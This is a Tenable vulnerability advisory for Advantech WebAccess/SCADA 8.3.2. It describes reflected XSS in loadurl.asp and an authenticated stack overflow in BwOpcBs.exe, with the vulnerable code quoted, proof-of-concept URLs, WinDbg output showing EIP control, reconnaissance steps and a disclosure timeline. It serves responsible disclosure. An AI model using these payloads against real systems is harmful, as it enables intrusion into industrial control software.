Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] Multiple Advantech WebAccess Vulnerabilities

High

Synopsis

Tenable has discovered multiple vulnerabilities in Advantech WebAccess/SCADA 8.3.2.

CVE-2018-15703: Multiple Reflected Cross-Site Scripting

The broadweb/loadurl.asp page processes several HTTP GET parameters when rendering HTML output. The following parameter values are incorporated into the response without sanitization:

  • title
  • url
  • lc
  • rc
  • tc
  • bc

All of these parameters can be abused to inject malicious JavaScript and HTML into the page. Furthermore, the url parameter is used as the source of an iframe in the generated page. Below are code snippets showing the vulnerable code.

title_desc = <%="'" + Request.QueryString("title") + "'"%>;
page_url = <%="'" + Request.QueryString("url") + "'"%>;

left_c   = <%="'" + Request.QueryString("lc") + "'"%>;
right_c  = <%="'" + Request.QueryString("rc") + "'"%>;
top_c    = <%="'" + Request.QueryString("tc") + "'"%>;
bottom_c = <%="'" + Request.QueryString("bc") + "'"%>;

… snip …

document.write("<IFRAME NAME=page FRAMEBORDER=no WIDTH=100% HEIGHT=100% SRC='" + page_url + "' STYLE=position:relative;display:block>");

The following are proof of concepts:

http://192.168.1.192/broadweb/loadurl.asp?title=%27;alert(%22xss%22);//
http://192.168.1.192/broadweb/loadurl.asp?url=%27;alert(%22xss%22);//
http://192.168.1.192/broadweb/loadurl.asp?lc=%27;alert(%22xss%22);//
http://192.168.1.192/broadweb/loadurl.asp?rc=%27;alert(%22xss%22);//
http://192.168.1.192/broadweb/loadurl.asp?tc=%27;alert(%22xss%22);//
http://192.168.1.192/broadweb/loadurl.asp?bc=%27;alert(%22xss%22);//
http://192.168.1.192/broadweb/loadurl.asp?url=http://tenable.com

CVE-2018-15704: Authenticated Stack Buffer Overflow

A stack buffer overflow vulnerability exists in BwOpcBs.exe. An authenticated remote attacker can reach the vulnerability via /broadweb/system/opcImg.asp . This is due to a lack of input validation during the processing of the sv parameter. This parameter value is used to dynamically construct a command line, which is then passed to the RemoteWinExec function defined within webdobj.webdraw. Finally, BwOpcBs.exe is launched with the value of sv as its second command line argument.

The command line looks like such, where <sv> is the value of the sv parameter:

Bwopcbs.exe 1 <sv>

The BwOpcBs.exe executable does not properly validate its command line arguments, and a stack buffer can be overflowed by specifying a large value in sv. Specifically, a buffer consisting of 492 bytes will overwrite the instruction pointer.

In order for an attacker to successfully exploit this vulnerability, the following parameters must be specified when requesting opcImc.asp:

  • proj
  • node
  • opt

Values for proj and node must be known prior to launching an attack. These can be discovered by performing the following steps:

  1. Visit /WADashboard/login?cont=dashboardViewer in a web browser.
  2. Project names will be listed in the drop-down menu.
  3. Choose a project name.
  4. Visit /broadweb/<project name>.dpj. Replace <project name> with the project you selected.
  5. Notice that there are node names listed. Choose a node name.

The value of 'opt' must be 1.

Using this information, a remote attacker may craft a malicious URL to be sent to a WebAccess administrator. Once this URL is visited the exploit would be launched. Below is a code snippet in opcImc.asp showing the vulnerable code.

if opt = 1 then
	if instr(UCase(opcServer), "RW.FASERVER" ) > 0 then
		cmdLine = "Bwopcbs.exe 1 " + Request.QueryString("sv")
	else
		cmdLine = "Bwopcbs.exe 1 " + Request.QueryString("sv")
	end if
end if

select case opt
case 1
	tObj.RemoteWinExec proj, node, cmdLine
	tObj.BwSleep(100)
	tObj.RemoteFileTransfer proj, node, ".", ".", "Bwopcbs.ini", 0

The following is output from WinDbg, showing an access violation. Notice that EIP is overwritten with 0x41414141 ("AAAA").

Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: C:\WebAccess\Node\BwOpcBs.exe 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is: 
ModLoad: 00000000`00400000 00000000`00411000   image00000000`00400000
ModLoad: 00000000`77ab0000 00000000`77c59000   ntdll.dll
ModLoad: 00000000`77c90000 00000000`77e10000   ntdll32.dll
ModLoad: 00000000`74900000 00000000`7493f000   C:\Windows\SYSTEM32\wow64.dll
ModLoad: 00000000`748a0000 00000000`748fc000   C:\Windows\SYSTEM32\wow64win.dll
ModLoad: 00000000`74890000 00000000`74898000   C:\Windows\SYSTEM32\wow64cpu.dll
(3324.21e4): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
ntdll!CsrSetPriorityClass+0x40:
00000000`77b5cb70 cc              int     3
0:000> !load winext/msec
0:000> g
ModLoad: 00000000`77990000 00000000`77aaf000   WOW64_IMAGE_SECTION
ModLoad: 00000000`75da0000 00000000`75eb0000   WOW64_IMAGE_SECTION
ModLoad: 00000000`77990000 00000000`77aaf000   NOT_AN_IMAGE
ModLoad: 00000000`77890000 00000000`7798a000   NOT_AN_IMAGE
ModLoad: 00000000`75da0000 00000000`75eb0000   C:\Windows\syswow64\kernel32.dll
ModLoad: 00000000`75fa0000 00000000`75fe7000   C:\Windows\syswow64\KERNELBASE.dll
ModLoad: 00000000`75f00000 00000000`75fa0000   C:\Windows\syswow64\ADVAPI32.dll
ModLoad: 00000000`75990000 00000000`75a3c000   C:\Windows\syswow64\msvcrt.dll
ModLoad: 00000000`75850000 00000000`75869000   C:\Windows\SysWOW64\sechost.dll
ModLoad: 00000000`75870000 00000000`75960000   C:\Windows\syswow64\RPCRT4.dll
ModLoad: 00000000`757f0000 00000000`75850000   C:\Windows\syswow64\SspiCli.dll
ModLoad: 00000000`757e0000 00000000`757ec000   C:\Windows\syswow64\CRYPTBASE.dll
ModLoad: 00000000`75ff0000 00000000`7614c000   C:\Windows\syswow64\ole32.dll
ModLoad: 00000000`77460000 00000000`774f0000   C:\Windows\syswow64\GDI32.dll
ModLoad: 00000000`76450000 00000000`76550000   C:\Windows\syswow64\USER32.dll
ModLoad: 00000000`76320000 00000000`7632a000   C:\Windows\syswow64\LPK.dll
ModLoad: 00000000`774f0000 00000000`7758d000   C:\Windows\syswow64\USP10.dll
ModLoad: 00000000`75cc0000 00000000`75d4f000   C:\Windows\syswow64\OLEAUT32.dll
(3324.21e4): WOW64 breakpoint - code 4000001f (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll32.dll - 
ntdll32!LdrVerifyImageMatchesChecksum+0x96c:
77d3103b cc              int     3
0:000:x86> g
ModLoad: 75a40000 75aa0000   C:\Windows\SysWOW64\IMM32.DLL
ModLoad: 75aa0000 75b6c000   C:\Windows\syswow64\MSCTF.dll
ModLoad: 00000000`76290000 00000000`76313000   C:\Windows\syswow64\CLBCatQ.DLL
(3324.21e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
41414141 ??              ???
0:000:x86> r
eax=00000000 ebx=7efde000 ecx=0040c390 edx=0018f318 esi=0040f125 edi=0018fc6d
eip=41414141 esp=0018fa14 ebp=0018ff88 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010212
41414141 ??              ???

Below is a proof of concept. In order to test it out, ensure you are logged in and replace the following items to contain valid values:

  • IP/hostname
  • proj
  • node
http://192.168.1.192/broadweb/system/opcImg.asp?proj=myproject&node=mynode&sv=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&opt=1

Solution

No solution currently exists.

Disclosure Timeline

07-13-2018 - Vulnerabilities discovered.
07-13-2018 - Tenable made contact with representative using live chat feature on Advantech website. Representative provides a security contact email.
07-13-2018 - Tenable sent an e-mail to the security contact asking for preferred method of disclosure.
07-19-2018 - Tenable made contact with another representative using live chat feature on Advantech website. Representative provides a new security contact email.
07-19-2018 - Tenables asks the new security contact their preferred method of disclosure.
07-19-2018 - Tenable sent a message via company web form.
07-20-2018 - Tenable sent a disclosure to both security contacts. 90 day date communicated as 10-18-2018.
08-09-2018 - Received response from Advantech. Third contact is preferred security contact. Disclosures forwarded to that email address.
08-09-2018 - Advantech confirms the issues will be handled.
08-09-2018 - Tenable asks Advantech to confirm they have received all vulnerability reports, as they were bundled together.
08-10-2018 - Advantech confirms that all issues were received.
08-27-2018 - Tenable asks for an update on the issues and when a patch will be released.
08-27-2018 - Advantech indicates that one particular vulnerability will be fixed in the next release in September.
08-28-2018 - Tenable sends a reminder that there are multiple vulnerabilities and asks if all of these will be fixed in September.
09-04-2018 - Tenable asks for clarification on which vulnerabilities will be fixed and on what date.
09-20-2018 - Tenable asks for another update.
10-18-2018 - Tenable reminds Advantech that today is disclosure day.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Try for Free Buy Now

Try Tenable.io

FREE FOR 60 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Sign up now.

Buy Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

$2,275.00

Buy Now

Try for Free Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save

Try for Free Buy Now

Try Tenable.io Web Application Scanning

FREE FOR 60 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578.00

Buy Now

Try for Free Contact Sales

Try Tenable.io Container Security

FREE FOR 60 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Learn More about Industrial Security

Get a Demo of Tenable.sc

Please fill out the form below with your contact information and a sales representative will contact you shortly to schedule a demo. You may also include a short comment (limited to 255 characters). Please note that fields with asterisks (*) are mandatory.